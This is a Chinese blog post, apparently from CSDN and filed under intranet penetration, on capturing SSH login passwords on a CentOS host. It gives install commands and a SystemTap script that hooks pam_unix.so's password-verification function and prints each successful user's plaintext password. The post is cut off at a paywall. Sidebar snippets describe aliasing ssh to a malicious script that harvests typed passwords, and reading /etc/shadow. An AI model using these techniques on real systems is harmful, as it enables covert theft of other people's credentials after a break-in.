linux下监控并实现记录ssh登录密码

最新推荐文章于 2024-04-26 09:54:17 发布
最新推荐文章于 2024-04-26 09:54:17 发布
阅读量2.7k 收藏 2
点赞数 1
分类专栏: 内网渗透 文章标签: SSH密码抓取
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39101049/article/details/103735453
版权

测试环境:

Linux 2.6.32-754.25.1.el6.x86_64

CentOS release 6.10 (Final)

 

首先安装systemtap这个包

原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获,因为用户登录认证需要使用pam_unix.so库文件。

yum --releasever=6.4 update

yum install -y systemtap

debuginfo-install $(rpm -qf /lib/security/pam_unix.so) //64位的机器为lib64目录

touch /root/capture_pass.stp

插入代码:

#!/usr/bin/stap

global username, pass, isSuccRet = 1;

probe process("/lib/security/pam_unix.so").function("_unix_verify_password")

{

username = user_string($name);

pass = user_string($p);

}

probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return

{

if ($return == 0)

{

printf("User: %s\nPassword: %s\n\n", username, pass);

isSuccRet = 0;

}
最低0.47元/天 解锁文章
2ed
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
linux 记录ssh密码,Linux下低权限用户记录SSH密码
weixin_33957458的博客
05-12 665
实现思路当用户执行 ssh user@remotehost 时,实际上执行的是我的恶意脚本,负责将用户输入的密码存在本地,并传参给正常的SSH连接,实现抓取SSH密码的功能。具体步骤首先使用 alias 命令创建一个别名这样当用户执行ssh时,执行的是指定的脚本alias ssh="/tmp/.ssh"当设置完别名后,仍可使用 /usr/bin/ssh 进行正常的SSH连接测试一下接下来观察正常的...
通过命令查看linux 密码,linux查看用户密码(linux查看用户密码命令)
热门推荐
weixin_36028342的博客
04-28 6万+
linux查看用户密码(linux查看用户密码命令)2020-05-15 13:18:30共10个回答1、用户名和密码的存储位置存储帐号的文件:/etc/passwd存储密码的文件:/etc/shadow2、可以使用cat、more、head、tail以及vim等命令查看或者修改,如下图所示:比如要查找系统中admin普通用户密码,则执行:cat/etc/shadow|grep"admin"3、...
探索高效SSH监控SSHPry 2.0
最新发布
gitblog_00050的博客
04-26 270
探索高效SSH监控SSHPry 2.0 项目地址:https://gitcode.com/nopernik/SSHPry2.0 项目简介 SSHPry 2.0 是一个强大的SSH活动监控工具,由开发者nopernik创建并开源。它旨在帮助系统管理员和网络安全专家实时追踪、记录和分析SSH会话,以便提升服务器的安全性。通过洞察SSH登录尝试的行为模式,你可以更好地保护你的网络资源免受恶意攻击。 技...
linux 监视ssh登录输出,适用于LinuxSSH登录监视器”
weixin_39678451的博客
05-12 149
保罗汤布林有正确的建议。设置日志记录在你的sshd_config指向一个syslog工具,你可以分别登录:=>见人3系统日志的更多的设施。选择一个像例如# LoggingSyslogFacility local5LogLevel INFO然后设置你的syslog.conf这样的:local5.info |/var/run/mysshwatcher.pipe添加你要写入/ etc/initta...
linux 监视ssh登录输出,rtop - 通过SSH监视远程Linux服务器的交互式工具
weixin_42494628的博客
05-12 335
rtop是一个基于SSH的直接和交互式远程系统监控工具 ,它收集并显示重要的系统性能值,如CPU , 磁盘 , 内存和网络指标 。它以Go语言编写,不需要在要监视的服务器上安装任何额外的程序,除了SSH服务器和工作凭据。rtop基本上是通过启动SSH会话,并在远程服务器上执行特定命令来收集各种系统性能信息。一旦建立了SSH会话,它就会每隔几秒(默认为5秒)持续刷新从远程服务器收集的信息,类似于Li...
linuxssh的安装与使用.doc
07-18
LinuxSSH 的安装与使用 LinuxSSH 的安装与使用是一种远程登录和文件传输的安全协议,整个过程包括安装、配置和使用三个部分...例如,可以使用 SSH 来管理网络设备,或者使用 SSH 来进行安全监控和日志记录等。
linux下采用shell编程和ftp实现文件采集功能
12-26
- FTP明文传输可能导致密码泄露,建议使用FTPS(FTP over SSL/TLS)或SFTP(SSH File Transfer Protocol)提供加密。 - 不要在脚本中硬编码敏感信息,如用户名和密码,可以使用环境变量或密钥对方式存储。 8. **...
user-info-api.tar.gz_linux 登录_linux登录
09-23
`user-info-api.tar.gz_linux 登录_linux登录`这个压缩包文件很可能包含了一个与用户信息API相关的实现,用于在Linux环境下进行登录验证。让我们深入探讨一下这个主题。 **用户信息API** 在Linux中,用户信息主要...
Linux下mysql异地自动备份的方法
09-08
以下将详细介绍如何在Linux实现MySQL的异地自动备份。 首先,我们来看一下实现这个功能的关键步骤: 1. **创建备份目录**: 在开始备份之前,我们需要在Linux服务器上创建一个专门用于存放备份文件的目录。例如...
ssh用户登录
06-04
在IT领域,SSH(Secure Shell)是一种网络协议,用于安全地远程登录到服务器,执行命令行操作,并在不安全的网络环境中加密数据传输。本文将深入探讨SSH框架下的用户注册和登录过程,以及相关的安全实践。 一、SSH...
记录linuxSSH免密登录
madman
03-06 213
当我们从一台机器通过ssh登录到另外一台机器的时候,总是会要求输入登录密码,为了不输入密码登录ssh提供了免密码登录,也就是所谓的公钥登录,公钥登录就是用户把自己的公钥发送到远程主机上,当远程主机需要登录的时候会做一个验签名的操作,如果签名通过那么就不需要密码登录啦。具体操作如下。1、生成rsa的秘钥对进入当前用户的根目录,执行ssh-keygen -t rsa,输入四个回车就行,不需要写啥....
终端保存ssh登录密码
hufang360的专栏
03-23 2569
ssh登录命令和密码写到终端配置里,通过自定义指令来快速执行SSH,并将密码复制到剪贴板中。 这里以 bash 为例,bash的配置文件是 ~/.bash_profile,在文件中添加以下内容: # 设置剪贴板 setClip() { osascript -e 'set the clipboard to "'"${*}"'" as text';} # 自定义 ssh指令 sship() { setClip "mima\r"; ssh root@192.168.3.21;} sship2() { setC
监视 SSH 登陆入侵者
weixin_34184561的博客
11-19 136
为什么80%的码农都做不了架构师?>>> ...
Linux中远程登陆与控制(ssh
白雪滑落树梢
09-02 2405
文章目录前言一、SSH远程管理1.OPenSSH服务器1.1 SSH(Secure Shell)协议1.2 OpenSSH2.ssh远程登陆方式2.1 登陆方法一2.2 登陆方法二3.服务配置与管理3.1 修改监听端口为25663.1.1 测试能否以22端口登陆3.2 安全调优总结 前言 一、SSH远程管理 配置OpenSSH服务端 使用SSH客户端程序 密钥对验证的SSH体系 1.OPenSSH服务器 openSSH实现ssh协议的开源软件项目,适用于各种UNIX、 Linux操作系统。 .
ELK系列 之 监控ssh登陆日志esalert告警
yuezhilangniao的博客
03-01 687
ELK版本问7,告警后面会用ESalert,前言引文:linux系统的安全日志为/var/log/secure,记录验证和授权方面的信息,只要涉及账号和密码的程序都会记录,比如SSH登录
linux ssh保存密码,linux下使用sshpass实现ssh记住密码
weixin_30877689的博客
04-29 828
我们在通过ssh登录服务器时,常常需要输入密码,一定很麻烦,有一个好用的工具可以解决这个问题。话不多说,下面开始介绍下如何使用。1.编译安装wget http://sourceforge.net/projects/sshpass/files/sshpass/1.05/sshpass-1.05.tar.gztar xvzf sshpass-1.05.tar.gz./configure --prefi...
linux ssh密码记录,Linux记录-ssh批量双向无密码登录
weixin_34170139的博客
05-01 165
1批量ssh密码登录#!/bin/bashset -euser=rootpassword=xxxssh_port=22iplist=(10.0.0.1 10.0.0.2 10.0.0.3)cat >> /etc/sudoers.d/app << EOFapp ALL=(ALL) ALLapp ALL=(ALL) NOPASSWD: ALLDefaults !env_res...
Linux下Nagios的安装与配置
09-21
Linux下Nagios的安装与配置,详细说明开源软件Nagios的部署。 一、Nagios 简介 Nagios 是一款开源的电脑系统和网络监视工具,能有效监控 Windows、Linux 和Unix 的主机状态,交换机路由器等网络设置,打印机等。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值